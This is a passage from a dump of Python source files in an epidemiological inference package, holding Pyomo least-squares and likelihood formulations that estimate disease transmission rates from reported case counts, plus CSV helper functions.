'failed-likelihood', 'msg': 'Unknown solver error for window %s and time %s.' % (str(w),str(t))}\n\n # Grab the results from the solver\n for i in recon:\n if i not in nodes:\n continue\n county = results[i]\n\n if total_infections <= 0 or model.beta[i].stale == True:\n # did not have sufficient data to determine a value for beta\n county['beta'].append( None )\n county['status'].append( 'stale' )\n else:\n county['beta'].append( value(model.beta[i]) )\n county['status'].append( 'ok' )\n county['infections_in_window'].append( window_transmissions[i][w] )\n county['infectious_pop_over_window'].append( infectious_pop_over_window[i][w] )\n county['transmissions_over_window'].append( transmissions_over_window[i][w] )\n county['reported_cases_over_window'].append( reported_cases_over_window[i][w] )\n county['days_since_first_reported'].append( days_since_first_reported_by_window[i][w] )\n\n return results\n" }, { "alpha_fraction": 0.6307286620140076, "alphanum_fraction": 0.6417277455329895, "avg_line_length": 40.56190490722656, "blob_id": "e26a30df38afed874d14d42627c7f55ef17ce46d", "content_id": "e5b79b70db91085dc8fda54f95394bc4d94ce389", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8728, "license_type": "no_license", "max_line_length": 194, "num_lines": 210, "path": "/epi_inference/formulations/decay_lsq.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "import pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import check_optimal_termination\nimport pandas as pd\nfrom datetime import datetime\nfrom epi_inference.reconstruction import common as rcommon\nfrom epi_inference.reconstruction import deterministic as recond\n\n# ToDo: add datetime handling to pass in the dates associated with the data\ndef run_decay_lsq(cm_rep_cases, population, sigma, gamma, report_delay, reporting_factor, analysis_window, Cdates, verbose=False):\n \"\"\"\n This 
function solves the least-squares inference inference formulation\n using the decay-based reconstruction function.\n\n Parameters\n ----------\n cm_rep_cases : list of *new* cases reported in each time period\n Note that this list is 1 entry longer than the transmissions, and \n it must start at zero (based on the assumptions in the reconstruction).\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n \"\"\"\n # check validity of some of the inputs\n assert sigma > 0\n assert gamma > 0\n assert report_delay > 0\n assert population > 0\n assert reporting_factor >= 1\n\n # create the Pyomo optimization formulation\n m = create_inference_formulation_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n report_delay=report_delay, reporting_factor=reporting_factor,\n analysis_window=analysis_window,\n verbose=verbose,\n lse=True\n )\n\n reconstruction = {\n 'date': m.DATES,\n 'S': m.S_data,\n 'T': m.T_data,\n 'E': m.E_data,\n 'I1': m.I1_data,\n 'I2': m.I2_data,\n 'I3': m.I3_data,\n 'R': m.R_data\n }\n \n # call the solver\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n\n # Check that the solve completed successfully\n if check_optimal_termination(status) == False:\n return {'est_beta': None, 'status': 'failed', 'msg': 'Unknown solver error.', 'population':population, 'total_cases':cm_rep_cases[-1], 'reconstruction': reconstruction}\n\n # check that the beta value was successfully solved\n if m.beta.stale == True:\n return {'est_beta': None,\n 'status': 'stale',\n 'msg': 'Transmission parameter beta not solved (stale).',\n 'population':population,\n 'total_cases':cm_rep_cases[-1],\n 'reconstruction': reconstruction\n }\n\n return {'est_beta': value(m.beta),\n 'status': 'ok',\n 'msg': 'Optimal solution found',\n 'population':population,\n 'total_cases':cm_rep_cases[-1],\n 'reconstruction': reconstruction\n }\n\ndef create_inference_formulation_decay(Cdates, cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, report_delay, reporting_factor, analysis_window, verbose=False, lse=True):\n \"\"\"\n Creates a one-step-ahead inference model using a decay model with 3 I compartments. 
The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n Cdates: list of datetime objects\n The list of datetime objects that correspond to the dates for the\n cumulative_reported_cases\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma_1 : float\n the rate constant for leaving the I1 compartment.\n gamma_2 : float\n the rate constant for leaving the I2 compartment.\n gamma_3 : float\n the rate constant for leaving the I3 compartment.\n report_delay : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n analysis_window : dict or None\n This is a dictionary indicating the window of time that should be used \n in the objective function. If None, then the full set of data will be used.\n The key \"days\" indicates the number of days from the end of the data that \n should be used in the objective function.\n verbose : bool\n If true, then more output is printed to the console when the analysis is run\n lse : bool\n If true, the activated objective corresponds to the least-squares, otherwise the \n likelihood objective will be activated.\n \"\"\"\n rdates, rcases = rcommon.reported_cases_from_cumulative(Cdates, cumulative_reported_cases)\n dates, T, S, E, I1, I2, I3, R = recond.reconstruct_states_deterministic_decay(\n Cdates=Cdates,\n cumulative_reported_cases=cumulative_reported_cases,\n population=population,\n sigma=sigma,\n gamma=gamma_1/3,\n reporting_factor=reporting_factor,\n report_delay=report_delay\n )\n\n \"\"\"\n T, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n report_delay=report_delay, reporting_factor=reporting_factor)\n \"\"\"\n\n if verbose: # pragma: no cover\n print('corrected case data being used:')\n print(T)\n \n model = pe.ConcreteModel()\n model.DATES = dates\n model.T_data = T\n model.S_data = S\n model.E_data = E\n model.I1_data = I1\n model.I2_data = I2\n model.I3_data = I3\n model.R_data = R\n\n # cache some parameters on the model\n model.N = population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.report_delay = report_delay\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(T))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n\n start=0\n if analysis_window.get('days',None) is not None:\n start = max(start, len(model.timesteps)-analysis_window.get('days',None)-1)\n model.TIMES_m_obj = pe.Set(initialize=model.timesteps[start:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.T_hat = pe.Var(model.TIMES, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n return m.T_hat[t] == m.beta * (I1[t] + I2[t] + I3[t]) * S[t] / m.N\n model.infection_process = pe.Constraint(model.TIMES_m_obj, rule=_infection_process)\n\n # least squares 
objective function\n def _lse(m):\n return sum( (m.T_hat[t] - T[t])**2 for t in m.TIMES_m_obj)\n model.o_lse = pe.Objective(rule=_lse)\n\n def _like(m):\n return sum( T[t]/m.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_obj if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-T[t])/m.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / m.N)) for t in m.TIMES_m_obj)\n model.o_like = pe.Objective(rule=_like, sense=pe.maximize)\n\n if lse:\n model.o_like.deactivate()\n else:\n model.o_lse.deactivate()\n return model\n" }, { "alpha_fraction": 0.6105970144271851, "alphanum_fraction": 0.6247958540916443, "avg_line_length": 40.28089904785156, "blob_id": "ce7150a4be1fc6573c441c0ce87dc1e113ba8656", "content_id": "9a0982c72c2367f72108096d3210424587146f21", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 22044, "license_type": "no_license", "max_line_length": 176, "num_lines": 534, "path": "/epi_inference/formulations/attic/formulations.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "#\n# THIS IS THE OLD FILE WITH FORMULATIONS\n#\n# These models have been moved to seperate files, except for the *delay*\n# formulations, which are not actively used.\n#\nimport pyomo.environ as pe\nfrom pyomo.environ import SolverFactory, value\nfrom pyomo.opt import assert_optimal_termination\nimport math\n\nfrom ..tseir_utils import compute_compartments_time_delay, compute_compartments_decay\n\n\ndef run_multinode_decay_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_multinode_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n #m.pprint()\n #m.display()\n\n return {'est_beta': value(m.beta)}\n\ndef run_decay_lsq(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n return {'est_beta': value(m.beta)}\n\ndef run_decay_blike(cm_rep_cases, population, sigma, gamma, deltaP, reporting_factor, verbose=False):\n assert sigma > 0\n assert gamma > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_decay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population, sigma=sigma,\n gamma_1=gamma*3, gamma_2=gamma*3, gamma_3=gamma*3,\n deltaP=deltaP, reporting_factor=reporting_factor,\n verbose=verbose\n )\n\n solver = SolverFactory('ipopt')\n solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n\n m.lse.deactivate()\n m.like.activate()\n solver = SolverFactory('ipopt')\n 
solver.options['tol']=1e-8\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status) \n\n return {'est_beta': value(m.beta)}\n\ndef run_delay_lsq(cm_rep_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n assert deltaE > 0\n assert deltaI > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_delay_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n verbose=verbose\n )\n \n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n return {'est_beta': value(m.beta)}\n\ndef run_delay_ln_lsq(cm_rep_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n assert deltaE > 0\n assert deltaI > 0\n assert deltaP > 0\n assert population > 0\n assert reporting_factor >= 1\n\n m = create_inference_formulation_delay_ln_lsq(\n cumulative_reported_cases=cm_rep_cases,\n population=population,\n deltaE=deltaE,\n deltaI=deltaI,\n deltaP=deltaP,\n reporting_factor=reporting_factor,\n verbose=verbose\n )\n \n solver = SolverFactory('ipopt')\n status = solver.solve(m, tee=verbose)\n assert_optimal_termination(status)\n return {'est_ln_beta': value(m.ln_beta),\n 'est_beta': math.exp(value(m.ln_beta))}\n\ndef create_inference_formulation_delay_ln_lsq(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n \"\"\"Creates a one-step-ahead inference model based on time delays in\n each compartment. The model is written in terms of the\n ln-transform of the cases (not absolute)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n deltaE : int\n the number of days in the exposed compartment\n deltaI : int\n the number of days in the infectious compartment\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). 
If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I, R = compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n\n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.deltaE = deltaE\n model.deltaI = deltaI\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.ln_beta = pe.Var(initialize=math.log(1.3)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.ln_Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # log of the infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n if I[t]==0:\n # if there are no infectives today, I am getting no information about beta\n # with this equation - let ln_Chat be free\n if verbose:\n print(' *** No infectives at time ', t, 'skipping equation for ln_Chat[', t+1, ']')\n return pe.Constraint.Skip\n return m.ln_Chat[t+1] == m.ln_beta + m.alpha*math.log(I[t]) + math.log(S[t]) - math.log(model.N)\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n \"\"\"\n expr = 0\n for t in model.TIMES_m_one:\n if cases[t-1] > 0:\n # we have computed an ln_Chat at t\n if cases[t] == 0:\n # we computed a ln_Chat at t, but there are no cases in\n # the next timestep. Therefore, match a low number\n expr += (model.ln_Chat[t] - math.log(1e-8))**2\n else:\n # we computed a ln_Chat at t, and there are cases in\n # the next timestep. \n expr += (model.ln_Chat[t] - math.log(cases[t]))**2\n return expr\n \"\"\"\n \n expr = 0\n for t in model.TIMES_m_one:\n if cases[t] > 0:\n expr += (model.ln_Chat[t] - math.log(cases[t]))**2\n elif I[t-1] > 0: # There were cases to compute ln_Chat[t], but no cases now\n # we had cases before, but we do not now - need to think about the\n # value to include in the log below\n #print('TIMESTEP', t)\n expr += (model.ln_Chat[t] - math.log(0.75))**2\n return expr\n \n # TODO: Look above - instead of skipping, we may need to \"match beta\"\n# return sum( (model.ln_Chat[t] - math.log(cases[t]))**2 for t in model.TIMES_m_one if cases[t] > 0)\n# return sum( (model.ln_Chat[t] - math.log(cases[t]))**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n model.lse.pprint()\n \n return model\n\n\ndef create_inference_formulation_delay_lsq(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor, verbose=False):\n \"\"\"Creates a one-step-ahead inference model based on time delays in\n each compartment. 
The model is written in terms of the\n absolute number of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n deltaE : int\n the number of days in the exposed compartment\n deltaI : int\n the number of days in the infectious compartment\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). If set to 5 this means 1 in 5 cases is reported\n \"\"\"\n cases, S, E, I, R = compute_compartments_time_delay(cumulative_reported_cases, population, deltaE, deltaI, deltaP, reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.deltaE = deltaE\n model.deltaI = deltaI\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # log of the infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n return m.Chat[t+1] == m.beta * I[t]*S[t]/model.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n return sum( (model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n# return sum( 1.0/max(cases[t]**2,1.0)*(model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n\n return model\n\n\ndef create_inference_formulation_multinode_decay_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay\n model with 3 I compartments. The model is written in terms of absolute\n numbers of cases (not ln-transform). The model combines estimates across\n multiple time series, one for each node.\n\n Parameters\n ----------\n\n cumulative_reported_cases : a dataframe of *new* cases reported in\n each time period; each column in the dataframe is a separate time\n series\n population : a dataframe with a single column that represents the\n population for different columns in cumulative_reported_cases\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). 
If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n model = pe.ConcreteModel()\n\n # Cached data\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.reporting_factor = reporting_factor\n\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n ## IS THIS AN ERROR?\n ##model.alpha = pe.Var(initialize=1.0)\n ##model.alpha.fix(1.0)\n\n model.A = pe.Set(initialize=[v for v in cumulative_reported_cases.keys().to_list()])\n\n def block_rule(B, nodeid):\n # Cached data\n B.N = population[int(nodeid)] # overall population\n\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases[nodeid],\n population=B.N,\n sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n if verbose:\n print('corrected case data being used:')\n print(cases)\n\n # define the set of times\n B.timesteps = [i for i in range(len(cases))]\n B.TIMES = pe.Set(initialize=B.timesteps, ordered=True)\n B.TIMES_m_one = pe.Set(initialize=B.timesteps[1:], ordered=True)\n\n # define the case count variables\n B.Chat = pe.Var(B.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(b, t):\n if t == b.TIMES.last():\n return pe.Constraint.Skip\n return b.Chat[t+1] == model.beta * (I1[t] + I2[t] + I3[t]) * S[t] / b.N\n B.infection_process = pe.Constraint(B.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(b):\n return sum( (b.Chat[t] - cases[t])**2 for t in b.TIMES_m_one)\n B.lse = pe.Expression(rule=_lse)\n\n model.b = pe.Block(model.A, rule=block_rule)\n\n def _total_lse(m):\n return sum( m.b[a].lse for a in m.A )\n model.total_lse = pe.Objective(rule=_total_lse)\n\n ## likelihood objective function\n #def _like(m):\n # #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n # return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n #model.like = pe.Objective(rule=_like, sense=pe.maximize)\n #model.like.deactivate()\n\n return model\n\ndef create_inference_formulation_decay_lsq(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform)\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). 
If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n # define the case count variables\n model.Chat = pe.Var(model.TIMES_m_one, initialize=1.0)\n\n # infection process\n def _infection_process(m, t):\n if t == m.TIMES.last():\n return pe.Constraint.Skip\n return m.Chat[t+1] == m.beta * (I1[t] + I2[t] + I3[t]) * S[t] / model.N\n model.infection_process = pe.Constraint(model.TIMES, rule=_infection_process)\n\n # least squares objective function\n def _lse(m):\n return sum( (model.Chat[t] - cases[t])**2 for t in model.TIMES_m_one)\n model.lse = pe.Objective(rule=_lse)\n\n # likelihood objective function\n def _like(m):\n #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n model.like = pe.Objective(rule=_like, sense=pe.maximize)\n model.like.deactivate()\n\n return model\n\ndef create_inference_formulation_decay_blike(cumulative_reported_cases, population, sigma, gamma_1, gamma_2, gamma_3, deltaP, reporting_factor, verbose=False):\n \"\"\"\n Creates a nonlinear one-step-ahead inference model using a decay model with 3 I compartments. The model is written in terms of absolute numbers of cases (not ln-transform).\n This formulation uses a log-likelihood for the binomial distribution to estimate beta.\n\n Parameters\n ----------\n cumulative_reported_cases : list of *new* cases reported in each time period\n population : the population of the node being considered\n sigma : float\n the rate constant for cases leaving the E compartment (1/incubation period)\n gamma : float\n the rate constant for leaving the I compartment. This will be multiplied\n by 3 when applied to each of the three I compartments\n deltaP : int\n the number of days between when someone is infected and when\n they will become a reported case (This should only shift the data\n and not impact the inference results.)\n reporting_factor : float\n The reporting factor (>1). 
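A standalone sketch (assumed, not the package API) of the binomial likelihood used by the _like objectives above: up to the constant 1/N scaling in the code, each day contributes cases[t]*ln(p_t) + (S[t]-cases[t])*ln(1-p_t) with p_t = 1 - exp(-beta*(I1[t]+I2[t]+I3[t])/N), and a simple grid scan over beta recovers the transmission parameter.

import numpy as np

def binomial_loglike(beta, cases, S, Itot, N):
    p = 1.0 - np.exp(-beta * Itot / N)
    mask = Itot > 0                          # days with no infectives carry no information
    return np.sum(cases[mask] * np.log(p[mask]) + (S[mask] - cases[mask]) * np.log(1.0 - p[mask]))

N = 1_000_000.0
beta_true = 0.6
Itot = np.array([50.0, 80.0, 130.0, 210.0, 330.0])
S = np.full_like(Itot, N)
cases = S * (1.0 - np.exp(-beta_true * Itot / N))   # expected new cases each day
grid = np.linspace(0.1, 1.5, 141)                   # 0.01 spacing
best = grid[np.argmax([binomial_loglike(b, cases, S, Itot, N) for b in grid])]
print(best)                                         # close to 0.6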
If set to 5 this means 1 in 5 cases is reported\n\n \"\"\"\n cases, S, E, I1, I2, I3, R = compute_compartments_decay(cumulative_reported_cases=cumulative_reported_cases,\n population=population, sigma=sigma,\n gamma_1=gamma_1, gamma_2=gamma_2, gamma_3=gamma_3,\n deltaP=deltaP, reporting_factor=reporting_factor)\n\n if verbose:\n print('corrected case data being used:')\n print(cases)\n \n model = pe.ConcreteModel()\n\n # cache some parameters on the model to make\n # reporting easier\n model.N = population # overall population\n model.sigma = sigma\n model.gamma_1 = gamma_1\n model.gamma_2 = gamma_2\n model.gamma_3 = gamma_3\n model.deltaP = deltaP\n model.rep_fac = reporting_factor\n\n # define the set of times\n model.timesteps = [i for i in range(len(cases))]\n model.TIMES = pe.Set(initialize=model.timesteps, ordered=True)\n model.TIMES_m_one = pe.Set(initialize=model.timesteps[1:], ordered=True)\n\n # define the parameters\n model.beta = pe.Var(initialize=1.3, bounds=(0,None)) # transmission parameter\n model.alpha = pe.Var(initialize=1.0)\n model.alpha.fix(1.0)\n\n def _like(m):\n #return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one if I1[t-1] + I2[t-1] + I3[t-1] > 0) + \\\n # sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t-1] + I2[t-1] + I3[t-1]) / model.N)) for t in model.TIMES_m_one)\n return sum( cases[t]/model.N*pe.log(1-pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one if I1[t] + I2[t] + I3[t] > 0) + \\\n sum( (S[t]-cases[t])/model.N*pe.log(pe.exp(-m.beta * (I1[t] + I2[t] + I3[t]) / model.N)) for t in model.TIMES_m_one)\n model.like = pe.Objective(rule=_like, sense=pe.maximize)\n \n return model\n" }, { "alpha_fraction": 0.6035856604576111, "alphanum_fraction": 0.6035856604576111, "avg_line_length": 29.714284896850586, "blob_id": "23e2dc04a33fd0759c16d6045352a8856f3ad098", "content_id": "56807c548fb8a2bfac2aa192bbef2f1f36d6d935", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1506, "license_type": "no_license", "max_line_length": 94, "num_lines": 49, "path": "/epi_inference/collect/misc.py", "repo_name": "or-fusion/epi_inference", "src_encoding": "UTF-8", "text": "__all__ = ['load_collect', 'save_collect']\n\nimport os\nimport csv\nimport pandas as pd\n\n\ndef load_collect(input_csv):\n \"\"\"\n This function loads a CSV file containing results from the 'collect' workflow. The\n CSV data is assumed to have a 'Date' column.\n\n Parameters\n ----------\n input_csv : string\n File name of the CSV file\n\n Returns\n -------\n Pandas dataframe containing the data from the CSV file.\n \"\"\"\n try:\n assert(os.path.exists(input_csv))\n except: # pragma: no cover\n raise RuntimeError(\"load_collect: ERROR. Input file \"+input_csv+\" does not exist.\")\n return pd.read_csv(input_csv, index_col='Date')\n\n\ndef save_collect(output_csv, df, verbose, warnings):\n \"\"\"\n This function loads a CSV file containing results from the 'collect' workflow. 
The\n CSV data is assumed to have a 'Date' column.\n\n Parameters\n ----------\n input_csv : string\n File name of the CSV file\n\n Returns\n -------\n Pandas dataframe containing the data from the CSV file.\n \"\"\"\n filedir = os.path.dirname(output_csv)\n if filedir and not os.path.exists(filedir): # pragma: no cover\n os.makedirs(filedir)\n if verbose and os.path.exists(output_csv): # pragma: no cover\n warnings.append( \"WARNING: over-writing file \"+output_csv )\n print(\"Writing file: \"+output_csv)\n df.to_csv(output_csv, quoting=csv.QUOTE_NONNUMERIC)\n\n" }, { "alpha_fraction": 0.41717329621315, "alphanum_fraction": 0.45054715871810913, "avg_line_length": 39.910804748535156, "blob_id": "1721e88a0c5fa489cf2aaf777ec35d1d36ec8b58", "content_id": "c1b681e3a20460308247735740a03d236fd760c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23851, "license_type": "no_license", "max_line_length": 120, "num_lines": 583, "path": "/epi_inference/formulations/attic/tests/bad_formulations.py", "repo_name": "or-fusion/epi_inference", 